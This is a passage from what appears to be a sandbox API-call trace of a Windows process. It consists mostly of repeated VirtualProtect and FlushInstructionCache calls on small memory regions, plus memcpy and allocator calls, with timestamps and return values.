out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0113.561] GetCurrentProcess () returned 0xffffffff [0113.561] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b5, dwSize=0x2) returned 1 [0113.561] GetCurrentProcess () returned 0xffffffff [0113.561] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d4, dwSize=0x14) returned 1 [0113.561] VirtualProtect (in: lpAddress=0xc9120d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0113.562] GetCurrentProcess () returned 0xffffffff [0113.562] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d5, dwSize=0x2) returned 1 [0113.562] GetCurrentProcess () returned 0xffffffff [0113.562] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f4, dwSize=0x14) returned 1 [0113.562] VirtualProtect (in: lpAddress=0xc9120f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0113.562] GetCurrentProcess () returned 0xffffffff [0113.562] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f5, dwSize=0x2) returned 1 [0113.562] GetCurrentProcess () returned 0xffffffff [0113.562] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912114, dwSize=0x14) returned 1 [0113.562] VirtualProtect (in: lpAddress=0xc912114, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0113.563] GetCurrentProcess () returned 0xffffffff [0113.563] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912115, dwSize=0x2) returned 1 [0113.563] GetCurrentProcess () returned 0xffffffff [0113.563] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912134, dwSize=0x14) returned 1 [0113.563] VirtualProtect (in: lpAddress=0xc912134, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0113.563] GetCurrentProcess () returned 0xffffffff [0113.563] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912135, dwSize=0x2) returned 1 [0113.563] GetCurrentProcess () returned 0xffffffff [0113.563] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912154, dwSize=0x14) returned 1 [0113.564] VirtualProtect (in: lpAddress=0xc912154, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0113.564] GetCurrentProcess () returned 0xffffffff [0113.564] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912155, dwSize=0x2) returned 1 [0113.564] GetCurrentProcess () returned 0xffffffff [0113.564] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912174, dwSize=0x14) returned 1 [0113.564] VirtualProtect (in: lpAddress=0xc912174, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0113.564] GetCurrentProcess () returned 0xffffffff [0113.565] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912175, dwSize=0x2) returned 1 [0113.565] GetCurrentProcess () returned 0xffffffff [0113.565] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912194, dwSize=0x14) returned 1 [0113.565] VirtualProtect (in: lpAddress=0xc912194, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0113.565] GetCurrentProcess () returned 0xffffffff [0113.565] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912195, dwSize=0x2) returned 1 [0113.565] GetCurrentProcess () returned 0xffffffff [0113.565] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b4, dwSize=0x14) returned 1 [0113.565] VirtualProtect (in: lpAddress=0xc9121b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0113.601] GetCurrentProcess () returned 0xffffffff [0113.602] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b5, dwSize=0x2) returned 1 [0113.602] GetCurrentProcess () returned 0xffffffff [0113.602] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d4, dwSize=0x14) returned 1 [0113.602] VirtualProtect (in: lpAddress=0xc9121d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0113.602] GetCurrentProcess () returned 0xffffffff [0113.602] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d5, dwSize=0x2) returned 1 [0113.602] GetCurrentProcess () returned 0xffffffff [0113.603] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc898, dwSize=0x14) returned 1 [0113.603] VirtualProtect (in: lpAddress=0xcadc898, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0113.603] GetCurrentProcess () returned 0xffffffff [0113.603] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc899, dwSize=0x2) returned 1 [0113.603] GetCurrentProcess () returned 0xffffffff [0113.603] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b8, dwSize=0x14) returned 1 [0113.603] VirtualProtect (in: lpAddress=0xcadc8b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0113.604] GetCurrentProcess () returned 0xffffffff [0113.604] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b9, dwSize=0x2) returned 1 [0113.604] GetCurrentProcess () returned 0xffffffff [0113.604] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d8, dwSize=0x14) returned 1 [0113.604] VirtualProtect (in: lpAddress=0xcadc8d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0113.605] GetCurrentProcess () returned 0xffffffff [0113.605] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d9, dwSize=0x2) returned 1 [0113.605] GetCurrentProcess () returned 0xffffffff [0113.605] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f8, dwSize=0x14) returned 1 [0113.605] VirtualProtect (in: lpAddress=0xcadc8f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0113.605] GetCurrentProcess () returned 0xffffffff [0113.605] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f9, dwSize=0x2) returned 1 [0113.605] GetCurrentProcess () returned 0xffffffff [0113.605] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc918, dwSize=0x14) returned 1 [0113.606] VirtualProtect (in: lpAddress=0xcadc918, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0113.606] GetCurrentProcess () returned 0xffffffff [0113.606] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc919, dwSize=0x2) returned 1 [0113.606] GetCurrentProcess () returned 0xffffffff [0113.606] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc938, dwSize=0x14) returned 1 [0113.606] VirtualProtect (in: lpAddress=0xcadc938, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0113.607] GetCurrentProcess () returned 0xffffffff [0113.607] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc939, dwSize=0x2) returned 1 [0113.607] GetCurrentProcess () returned 0xffffffff [0113.607] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc958, dwSize=0x14) returned 1 [0113.607] VirtualProtect (in: lpAddress=0xcadc958, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0113.607] GetCurrentProcess () returned 0xffffffff [0113.607] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc959, dwSize=0x2) returned 1 [0113.607] GetCurrentProcess () returned 0xffffffff [0113.608] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc978, dwSize=0x14) returned 1 [0113.608] VirtualProtect (in: lpAddress=0xcadc978, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0113.608] GetCurrentProcess () returned 0xffffffff [0113.608] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc979, dwSize=0x2) returned 1 [0113.608] GetCurrentProcess () returned 0xffffffff [0113.608] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc998, dwSize=0x14) returned 1 [0113.608] VirtualProtect (in: lpAddress=0xcadc998, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0113.609] GetCurrentProcess () returned 0xffffffff [0113.609] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc999, dwSize=0x2) returned 1 [0113.609] GetCurrentProcess () returned 0xffffffff [0113.609] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b8, dwSize=0x14) returned 1 [0113.609] VirtualProtect (in: lpAddress=0xcadc9b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0113.609] GetCurrentProcess () returned 0xffffffff [0113.609] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b9, dwSize=0x2) returned 1 [0113.609] GetCurrentProcess () returned 0xffffffff [0113.610] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d8, dwSize=0x14) returned 1 [0113.610] VirtualProtect (in: lpAddress=0xcadc9d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0113.610] GetCurrentProcess () returned 0xffffffff [0113.610] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d9, dwSize=0x2) returned 1 [0113.610] GetCurrentProcess () returned 0xffffffff [0113.610] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f8, dwSize=0x14) returned 1 [0113.610] VirtualProtect (in: lpAddress=0xcadc9f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0113.611] GetCurrentProcess () returned 0xffffffff [0113.611] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f9, dwSize=0x2) returned 1 [0113.611] GetCurrentProcess () returned 0xffffffff [0113.611] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca18, dwSize=0x14) returned 1 [0113.611] VirtualProtect (in: lpAddress=0xcadca18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0113.611] GetCurrentProcess () returned 0xffffffff [0113.611] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca19, dwSize=0x2) returned 1 [0113.611] GetCurrentProcess () returned 0xffffffff [0113.611] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca38, dwSize=0x14) returned 1 [0113.612] VirtualProtect (in: lpAddress=0xcadca38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0113.612] GetCurrentProcess () returned 0xffffffff [0113.612] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca39, dwSize=0x2) returned 1 [0113.612] GetCurrentProcess () returned 0xffffffff [0113.612] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca58, dwSize=0x14) returned 1 [0113.612] VirtualProtect (in: lpAddress=0xcadca58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0113.634] GetCurrentProcess () returned 0xffffffff [0113.634] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca59, dwSize=0x2) returned 1 [0113.634] GetCurrentProcess () returned 0xffffffff [0113.634] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca78, dwSize=0x14) returned 1 [0113.634] VirtualProtect (in: lpAddress=0xcadca78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0113.635] GetCurrentProcess () returned 0xffffffff [0113.635] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca79, dwSize=0x2) returned 1 [0113.635] GetCurrentProcess () returned 0xffffffff [0113.635] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e0, dwSize=0x14) returned 1 [0113.635] VirtualProtect (in: lpAddress=0xcadb0e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0113.635] GetCurrentProcess () returned 0xffffffff [0113.635] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e1, dwSize=0x2) returned 1 [0113.635] GetCurrentProcess () returned 0xffffffff [0113.635] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb100, dwSize=0x14) returned 1 [0113.635] VirtualProtect (in: lpAddress=0xcadb100, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0113.636] GetCurrentProcess () returned 0xffffffff [0113.636] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb101, dwSize=0x2) returned 1 [0113.636] GetCurrentProcess () returned 0xffffffff [0113.636] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb120, dwSize=0x14) returned 1 [0113.636] VirtualProtect (in: lpAddress=0xcadb120, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0113.636] GetCurrentProcess () returned 0xffffffff [0113.636] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb121, dwSize=0x2) returned 1 [0113.638] GetAsyncKeyState (vKey=3) returned 0 [0113.638] CRetailMalloc_Alloc () returned 0xcb00b00 [0113.638] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.638] memcpy (in: _Dst=0xb755050, _Src=0x197748, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0113.638] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.638] memcpy (in: _Dst=0xb755050, _Src=0xb755050, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0113.638] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.638] memcpy (in: _Dst=0xb754f4c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0113.639] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.639] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.639] memcpy (in: _Dst=0xb755050, _Src=0xb755050, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0113.639] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.639] memcpy (in: _Dst=0xb754f4c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0113.639] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.640] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.640] memcpy (in: _Dst=0xb755050, _Src=0xb755050, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0113.640] memcpy (in: _Dst=0xb754f48, _Src=0x19777c, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.640] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.640] CRetailMalloc_Realloc () returned 0xb3d6708 [0113.640] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.640] memcpy (in: _Dst=0xb755050, _Src=0xb755050, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0113.641] memcpy (in: _Dst=0xb754f48, _Src=0x19777c, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.641] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.641] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.641] memcpy (in: _Dst=0xb755050, _Src=0xb755050, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0113.641] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.641] memcpy (in: _Dst=0xb754f4c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0113.642] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.642] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.642] memcpy (in: _Dst=0xb755050, _Src=0xb755050, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0113.642] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.642] memcpy (in: _Dst=0xb754f4c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0113.642] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.643] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.643] memcpy (in: _Dst=0xb755050, _Src=0xb755050, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0113.643] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.643] memcpy (in: _Dst=0xb754f4c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0113.643] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.646] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.646] memcpy (in: _Dst=0xb755050, _Src=0xb755050, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0113.646] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.646] memcpy (in: _Dst=0xb754f4c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0113.646] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.646] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.646] memcpy (in: _Dst=0xb755050, _Src=0xb755050, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0113.646] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.646] memcpy (in: _Dst=0xb754f4c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0113.647] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.647] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.647] memcpy (in: _Dst=0xb755050, _Src=0xb755050, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0113.647] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.647] memcpy (in: _Dst=0xb754f4c, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0113.647] memcpy (in: _Dst=0xb754f50, _Src=0x19777c, _Size=0x4 | out: _Dst=0xb754f50) returned 0xb754f50 [0113.647] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.647] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.648] memcpy (in: _Dst=0xb755050, _Src=0xb755050, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0113.648] memcpy (in: _Dst=0xb754f48, _Src=0x19777c, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.648] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.648] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.648] memcpy (in: _Dst=0xb755050, _Src=0xb755050, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0113.648] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.648] memcpy (in: _Dst=0xb754f4c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0113.648] memcpy (in: _Dst=0xb754f48, _Src=0x197748, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.652] CRetailMalloc_Alloc () returned 0xc8cf5f0 [0113.652] memcpy (in: _Dst=0xc8cf5f0, _Src=0x0, _Size=0x0 | out: _Dst=0xc8cf5f0) returned 0xc8cf5f0 [0113.653] memcpy (in: _Dst=0xcb00d9c, _Src=0x1977e4, _Size=0x18 | out: _Dst=0xcb00d9c) returned 0xcb00d9c [0113.653] memcpy (in: _Dst=0xcb00dde, _Src=0xc8cf5f0, _Size=0x2 | out: _Dst=0xcb00dde) returned 0xcb00dde [0113.653] CRetailMalloc_Realloc () returned 0xcb00b00 [0113.653] CRetailMalloc_Free () returned 0x1 [0113.653] CRetailMalloc_Free () returned 0x1 [0113.653] GetCurrentProcess () returned 0xffffffff [0113.653] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912074, dwSize=0x14) returned 1 [0113.653] VirtualProtect (in: lpAddress=0xc912074, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0113.654] GetCurrentProcess () returned 0xffffffff [0113.654] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912075, dwSize=0x2) returned 1 [0113.654] GetCurrentProcess () returned 0xffffffff [0113.654] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912094, dwSize=0x14) returned 1 [0113.654] VirtualProtect (in: lpAddress=0xc912094, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0113.655] GetCurrentProcess () returned 0xffffffff [0113.655] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912095, dwSize=0x2) returned 1 [0113.655] GetCurrentProcess () returned 0xffffffff [0113.655] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b4, dwSize=0x14) returned 1 [0113.655] VirtualProtect (in: lpAddress=0xc9120b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0113.656] GetCurrentProcess () returned 0xffffffff [0113.656] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b5, dwSize=0x2) returned 1 [0113.656] GetCurrentProcess () returned 0xffffffff [0113.656] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d4, dwSize=0x14) returned 1 [0113.656] VirtualProtect (in: lpAddress=0xc9120d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0113.656] GetCurrentProcess () returned 0xffffffff [0113.656] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d5, dwSize=0x2) returned 1 [0113.656] GetCurrentProcess () returned 0xffffffff [0113.656] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f4, dwSize=0x14) returned 1 [0113.656] VirtualProtect (in: lpAddress=0xc9120f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0113.657] GetCurrentProcess () returned 0xffffffff [0113.657] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f5, dwSize=0x2) returned 1 [0113.657] GetCurrentProcess () returned 0xffffffff [0113.657] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912114, dwSize=0x14) returned 1 [0113.657] VirtualProtect (in: lpAddress=0xc912114, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0113.658] GetCurrentProcess () returned 0xffffffff [0113.658] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912115, dwSize=0x2) returned 1 [0113.658] GetCurrentProcess () returned 0xffffffff [0113.658] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912134, dwSize=0x14) returned 1 [0113.658] VirtualProtect (in: lpAddress=0xc912134, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0113.658] GetCurrentProcess () returned 0xffffffff [0113.658] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912135, dwSize=0x2) returned 1 [0113.659] GetCurrentProcess () returned 0xffffffff [0113.659] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912154, dwSize=0x14) returned 1 [0113.659] VirtualProtect (in: lpAddress=0xc912154, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0113.757] GetCurrentProcess () returned 0xffffffff [0113.757] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912155, dwSize=0x2) returned 1 [0113.757] GetCurrentProcess () returned 0xffffffff [0113.757] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912174, dwSize=0x14) returned 1 [0113.757] VirtualProtect (in: lpAddress=0xc912174, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0113.758] GetCurrentProcess () returned 0xffffffff [0113.758] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912175, dwSize=0x2) returned 1 [0113.758] GetCurrentProcess () returned 0xffffffff [0113.758] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912194, dwSize=0x14) returned 1 [0113.758] VirtualProtect (in: lpAddress=0xc912194, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0113.759] GetCurrentProcess () returned 0xffffffff [0113.759] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912195, dwSize=0x2) returned 1 [0113.759] GetCurrentProcess () returned 0xffffffff [0113.759] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b4, dwSize=0x14) returned 1 [0113.759] VirtualProtect (in: lpAddress=0xc9121b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0113.759] GetCurrentProcess () returned 0xffffffff [0113.759] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b5, dwSize=0x2) returned 1 [0113.759] GetCurrentProcess () returned 0xffffffff [0113.759] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d4, dwSize=0x14) returned 1 [0113.760] VirtualProtect (in: lpAddress=0xc9121d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0113.760] GetCurrentProcess () returned 0xffffffff [0113.760] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d5, dwSize=0x2) returned 1 [0113.760] GetCurrentProcess () returned 0xffffffff [0113.760] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc898, dwSize=0x14) returned 